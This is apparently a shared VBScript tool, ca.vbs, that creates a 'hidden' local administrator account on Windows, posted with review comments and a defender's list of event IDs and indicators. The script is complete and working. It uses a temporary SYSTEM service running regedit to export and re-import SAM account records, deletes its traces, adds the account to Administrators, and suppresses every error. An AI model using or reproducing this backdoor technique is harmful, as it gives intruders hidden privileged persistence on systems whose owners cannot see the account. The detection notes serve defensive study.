早期写的代码,见笑了
'==============================================================
' Copyright (c) veterans. All rights reserved.
' ScriptName: ca.vbs
' Creation Date: 28/6/2007
' Last Modified: 28/6/2007
' Author: veterans
' E-mail: lxzzr@21cn.com
' Description: System hide account creation tool.
'==============================================================
' Flat script, no procedures. Per the file header it creates a "hidden"
' local administrator account. Visible sequence: create a local user,
' export the SAM Users key with regedit run from a temporary service,
' delete the user, re-import the exported key, remove the service and the
' export file, add the account to Administrators, then verify membership.
'
' Defender view (general Windows behaviour, not shown in this file; event IDs
' are for current Windows versions and need the relevant auditing enabled):
'   - Security log 4720 (user created), 4726 (user deleted) and 4732 (member
'     added to a local group) for the same account name in a short window.
'   - System log 7045 / Security log 4697 (service installed) where the
'     service image path is regedit.exe with /e or /s.
'   - regedit.exe started by the service control manager with
'     HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users on its command line.
'   - A user.reg file in a temp directory. It holds exported SAM account
'     records, so treat any leftover copy as sensitive.

' Every runtime error from here on is suppressed and execution continues
' with the next statement, so no step below reports its own failure.
On Error Resume Next
' Two positional arguments: user name and password. They are read before
' the argument-count check further down; with errors suppressed, missing
' arguments do not stop the script at this point.
strUserName = Wscript.Arguments(0)
strPassWord = Wscript.Arguments(1)
' Script-host check: exit silently when the host executable name ends in
' "wscript.exe" (the GUI host). The usage text expects cscript.exe.
If (lcase(right(wscript.fullname,11))="wscript.exe") Then
WScript.Quit(0)
End If
' Argument-count check: with fewer than two arguments, print usage and exit.
' The usage line shows the user name with a trailing "$".
If wscript.arguments.count<2 Then
Wscript.Echo "System hide account creation tool."
Wscript.Echo ""
Wscript.Echo "Usage: cscript.exe //nologo " & WScript.ScriptName & " username$ password"
WScript.Quit(0)
End If
' Get the local computer name. Original author's note: the name must be
' given as a string here; "." cannot be used in its place.
Set ObjectNetwork = CreateObject("Wscript.Network")
strComputer = ObjectNetwork.ComputerName
' Connect to WMI (root\cimv2) on that computer with impersonation.
Set ObjectWMI = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
' Account-exists check: stop if Win32_UserAccount already has this name.
' NOTE(review): the WQL text is built by concatenating the raw argument;
' quote characters in the name are not escaped.
Set CheckAccount = ObjectWMI.ExecQuery("Select * from Win32_UserAccount WHERE Name='" & strUserName & "'")
If CheckAccount.count<>0 Then
Wscript.Echo "Account already exists."
WScript.Quit(0)
End If
' Create the local user through the ADSI WinNT provider and set its
' password. At this point the user belongs to no group (author's note).
Set ObjectComputer = GetObject("WinNT://" & strComputer & ",computer")
Set CreateAccount = ObjectComputer.Create("user", strUserName)
CreateAccount.SetPassword strPassWord
CreateAccount.SetInfo
' Choose the temporary service name. The author labels this a
' service-exists check; the query as written looks the name up in
' Win32_UserAccount and switches to the alternate name on a match.
strServiceName = "ForCreateAccount"
Set CheckService = ObjectWMI.ExecQuery("Select * from Win32_UserAccount WHERE Name='" & strServiceName & "'")
If CheckService.count<>0 Then
strServiceName = "ForCreateAccount-test"
End If
' Register a service whose command line is regedit exporting the SAM Users
' key to %temp%\user.reg. Author's note: the service is used to obtain
' SYSTEM privileges. Arguments 16, 2, "Automatic", true are passed as
' service type, error control, start mode and desktop-interact; the two
' trailing nulls are the start name and password (presumably LocalSystem,
' per the documented Win32_Service.Create default - confirm).
Set ObjectSvr = ObjectWMI.Get("Win32_Service")
ObjectSvr.Create strServiceName, strServiceName, "c:\windows\regedit.exe /e %temp%\user.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users", 16, 2, "Automatic", true, Null, null
' Everything up to the matching Next runs once per service object returned
' for that name.
Set ObjectServices = ObjectWMI.ExecQuery("Select * from Win32_Service where Name='" & strServiceName & "'")
For each ObjectService in ObjectServices
' Start, then stop, the service: this runs the export command line.
ObjectService.StartService()
ObjectService.StopService()
' Delete the user that was just created, via its parent container.
' ObjectAccount is bound here and reused after the delete.
Set ObjectAccount = GetObject("WinNT://" & strComputer & "/" & strUserName & ",user")
Set DelAccount = GetObject(ObjectAccount.Parent)
DelAccount.delete "user", ObjectAccount.Name
' Wait one second, then repoint the service at a silent (/s) regedit
' import of the exported file and run it the same way. Presumably this
' restores the deleted account's SAM records - confirm on a test host.
WScript.Sleep 1000
ChangeReturn = ObjectService.Change( , "c:\windows\regedit.exe /s %temp%\user.reg")
ObjectService.StartService()
ObjectService.StopService()
' Remove the temporary service.
ObjectService.Delete()
' Delete the export file. The lookup is for c:\windows\temp\user.reg only;
' the return value of Delete is stored in ErrorReturn and never checked.
Set ObjectFiles = ObjectWMI.ExecQuery("Select * from cim_datafile where name='c:\\windows\\temp\\user.reg'")
For Each ObjectFile in ObjectFiles
ErrorReturn = ObjectFile.Delete
Next
' Add the account to the local Administrators group, using the ADsPath of
' the object bound before the delete.
Set AddGroup = GetObject("WinNT://" & strComputer & "/Administrators,group")
AddGroup.Add(ObjectAccount.ADsPath)
Next
' Verify the result: scan Win32_GroupUser for an entry pairing this user
' name with "Administrators". Each component path is split on "=" and the
' third piece (the quoted Name value) is compared. Because errors are
' suppressed throughout, this check is the only outcome the script reports.
Set ObjectGroupUsers = ObjectWMI.ExecQuery("Select * from Win32_GroupUser")
For Each ObjectUser In ObjectGroupUsers
Group = split(ObjectUser.GroupComponent,"=")
User = split(ObjectUser.PartComponent,"=")
If (User(2)="""" & strUserName & """" and Group(2)="""Administrators""") Then
Wscript.Echo "Account creation success."
WScript.Quit(0)
End If
Next
' Reached only when no matching membership entry was found.
Wscript.Echo "Account creation failure."